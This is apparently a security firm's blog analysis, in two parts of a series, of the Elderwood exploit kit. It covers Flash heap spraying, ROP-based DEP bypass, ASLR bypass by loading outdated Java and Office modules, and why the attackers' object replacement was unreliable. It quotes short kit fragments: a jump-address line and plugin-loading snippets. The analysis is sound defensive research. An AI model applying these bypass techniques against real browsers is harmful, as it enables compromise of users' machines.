  • The reliance on the constant memory address provided by the SWF. If the sprayed allocations land somewhere other than this address where the exploit assumes they will be, the browser will crash. For example, if a non-ASLR’d plugin is loaded at 0x10ab0d0c, the exploit will never succeed. This can also occur on Windows XP if a large module is loaded at the default load address of 0x10000000.
  • The assumption that the 21st object will be reused by the stale CButton pointer. If the stale CButton pointer reuses any other address, then this assumption will cause the exploit to fail. In this case, the exploit will dereference 0x00410042 from the allocations of the “ab” strings.
  • The use of the garbage collector to trigger the vulnerability. Using the garbage collector is a good way to trigger this vulnerability, however, it can have uncertain side effects. For example, if the heap coalesces, it is likely that the stale pointer will point to a buffer not under the attacker’s control and cause the browser to crash.

Even before testing this exploit, it was clear that it could only target a subset of affected browsers due to its reliance on Flash and other plugins for bypassing DEP and ASLR. We built an ideal test environment with these constraints and found their replacement technique to be a significant source of unreliable behavior. Nearly 50% of website visitors who should have been exploited were not, due to the fragility of the replacement technique.

Conclusions

After being provided easy-to-use interfaces to DEP and ASLR bypasses, the user of this kit must only craft an object replacement strategy to create a working exploit. Our evaluation of the object replacement code in this exploit indicates the author’s grasp of this concept was poor and the exploit is unreliable as a result. Reliability of this exploit would have been much higher if the author had a better understanding of heap operations or had followed published methodologies for object replacements. Instead, the author relied upon assumptions about the state of memory and parts of their work appear copied from cookbook example code.

Up until this point, the case could be made that the many examples of copied example code were the result of a false flag. Our analysis indicates that, in the part of the exploit that mattered most, the level of skill displayed by the user remained consistent with the rest of the exploit. If the attacker were feigning incompetence, it is unlikely that this critical section of code would be impaired in more than a superficial way. Instead, this attack campaign lost nearly half of the few website visitors that it could have exploited. Many in the security industry believe that APT groups “weaponize” exploits before using them in the wild. However, continued use of the Elderwood kit for strategic website compromises indicates that neither solid engineering practices nor highly reliable exploit code is required for this attacker group to achieve their goals.

Writing Exploits with the Elderwood Kit (Part 1)

In the second part of our five-part series, we investigate the tools provided by the Elderwood kit for developing exploits from discovered vulnerabilities.

Several mitigations must be avoided or bypassed in order to exploit browser vulnerabilities, even on platforms as old as Windows XP. Elderwood provides tools to overcome these obstacles with little to no knowledge required of their underlying implementation. Historical use of the Elderwood kit for browser exploits has focused on use-after-free vulnerabilities in Internet Explorer. Exploitation of use-after-free vulnerabilities is well documented and systematic, and a quick search reveals several detailed walkthroughs. Exploits of this type have three primary obstacles to overcome:

  • Heap spray technique
  • DEP bypass
  • ASLR bypass

Each component of the kit abstracts a method for overcoming these obstacles in a straightforward way. We examine how these components work, their reliability and technical sophistication, and describe how they are exposed to the kit user. Supported targets and the reliability of exploit code are directly tied to the design and implementation decisions of these components.

Heap Spray and DEP Bypass (today.swf)

Data Execution Prevention (DEP) prevents memory from being implicitly executable. Exploits commonly create a payload in memory as data and then try to execute it. When DEP is enabled, the attacker must have their payload explicitly marked executable. In order to bypass this protection, an exploit can take advantage of code that is already in memory and is marked executable. Many exploits chain together calls to functions to mark their payload executable in a practice sometimes referred to as return-oriented programming (ROP). Internet Explorer 8 on Windows XP and later takes advantage of DEP and this mitigation must be bypassed to successfully execute code.

Today.swf performs the DEP bypass for the user. This Flash document sets up many ROP chains in memory so that one will be at a known location (heap spraying). When Internet Explorer is exploited, the exploit pivots the stack to one of the fake stacks instead of the legitimate one. After the stack pivot, the ROP chain executes a sequence of instructions to make an executable copy of the deobfuscation code that turns xsainfo.jpg into a DLL, and executes it. This can be done from within Flash, a plugin, because it shares the same memory space as the browser rendering process, unlike in Chrome, Safari, and Firefox.

The SWF is included before the JavaScript exploit code is loaded. When the SWF is loaded, the heap-spraying code runs automatically; the user does not need to know the details of the technique it uses. The end result is that the heap is full of fake stacks and the kit user can assume that the proper values will be at a specific address, 0x10ab0d0c. This means that the user only needs to know the single value of where to jump to.

window.location = unescape("%u0d0c%u10abhttps://www.google.com/settings/account");

For readers following along with our analysis, the software used to obfuscate the Flash component of the exploit is conveniently located on the first page of Google results for “SWF Encryption.” DoSWF is the first result that does not require an email address to download the installer and, as an added bonus, is developed by a Chinese company from Beijing.

As seen with many public exploits, it’s possible to perform this same task with only the JavaScript engine within the browser. This would remove the dependency on a third party plugin. Instead, this exploit will only work on browsers that have Flash installed and enabled. Techniques and libraries to perform precise heap manipulation in JavaScript are well-documented and have existed since at least 2007.

ASLR Bypass (Microsoft Office and Java 6)

Address Space Layout Randomization (ASLR) is an exploit mitigation present on Windows Vista and newer that randomizes the location of code in memory. ASLR frustrates an attacker’s ability to control program flow by making the location of code used for ROP gadgets unpredictable. The easiest method to bypass ASLR is to avoid it entirely by locating a module that is not compiled with the Dynamic Base flag, which indicates a lack of support for this feature. Such a module makes exploitation significantly easier and eliminates the advantage conferred by the mitigation entirely: once it is loaded at a fixed virtual address, the attacker can repurpose known instruction sequences within it as if ASLR did not exist.
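
Whether a module opts into ASLR is visible in its PE header. A short, Windows-specific sketch of the check (illustrative):

#include <windows.h>

// Returns true if the module was linked with /DYNAMICBASE, i.e. its
// DllCharacteristics advertise ASLR support.
bool supportsASLR(HMODULE mod) {
  PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)mod;
  PIMAGE_NT_HEADERS nt =
      (PIMAGE_NT_HEADERS)((BYTE *)mod + dos->e_lfanew);
  return (nt->OptionalHeader.DllCharacteristics &
          IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) != 0;
}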

In order to bypass ASLR, the kit comes with code to load several modules that are not compiled with the Dynamic Base flag. In this case, modules from Microsoft Office 2007/2010 and the Java 6 plugin without support for ASLR have been added. Memory addresses from within these modules are used to construct the ROP chains embedded in the Flash document.

It is trivial to take advantage of this feature to bypass ASLR. In all likelihood, a script is provided by the kit to call the various plugin loading routines necessary to load the correct modules. No further work is required. The kit authors use existing research and techniques off the shelf in order to develop these scripts: sample code from Oracle is used to load Java for their ASLR bypass. This example code shows up in Google using the search “force java 6” which is notable since the author needed to specifically load this version rather than the latest, which takes advantage of ASLR.

<script type="text/javascript" src="deployJava.js"></script>
try {
	location.href = 'ms-help://'
} catch (e) {}

try {
	var ma = new ActiveXObject("SharePoint.OpenDocuments.4");
} catch(e) {}

After attempting to load these plugins, config.html sets a value based on which ones were successful. It sets the innerHTML of the “test” div tag to either true, false, default or cat. Today.swf reads this value to determine which of its built-in ROP chains to load. This means that today.swf directly depends on the results of config.html and the plugins it loads, suggesting they were likely developed together and provided for the kit user.

As with the heap spray and DEP bypass, these techniques rely on third-party components to function. Unless one of these plugins is installed and enabled, the exploit will fail on Windows 7. The kit relies on Java being outdated, because its current versions do take advantage of ASLR. This issue was addressed with a Java 6 update in July 2011, and Java 7 was never affected. In the case of Microsoft Office, this weakness was described in a public walkthrough several months before the attack; however, it remained unpatched until after the attack.

We attempted to measure the number of browsers running these plugins in order to gauge the effectiveness of these ASLR bypasses and, therefore, of the entire exploit. We found that popular websites that track browser statistics neglect to track usage of Microsoft Office plugins, instead opting to list more common plugins like Silverlight, Google Gears and Shockwave. In the case of Java 6, even in the best-case scenario, with no minor versions of Java patched, only roughly 30% of website visitors could be successfully exploited.

Conclusions

The Elderwood kit ships with reusable components for developing exploits for use-after-free vulnerabilities. It provides a capability to spray the heap with Adobe Flash, a set of techniques to load modules without support for ASLR, and several ROP chains for various versions of Windows to bypass DEP. The user of these tools needs little to no understanding of the tasks they accomplish. For example, instead of requiring the user to understand anything about memory layouts and heap allocations, they can simply use a constant address provided by the kit. In fact, readers who made it this far may have a deeper understanding of these components than the people who need to use them.

Many exploit development needs are accounted for by using these tools, however, some tasks are specific to the discovered vulnerability. In order to use the ROP gadgets that have been placed in memory by the SWF, the toolkit user must have control of program flow. This is specific to the exploitation of each vulnerability and the toolkit cannot help the user perform this task. We discuss the specific solutions to this problem by the toolkit user in the next section.

If you’re interested in learning more about how modern attacks are developed and performed, consider coming to SummerCon early next month and taking one of our trainings. Subscribe to our newsletter to stay up-to-date on our trainings, products and blog posts.
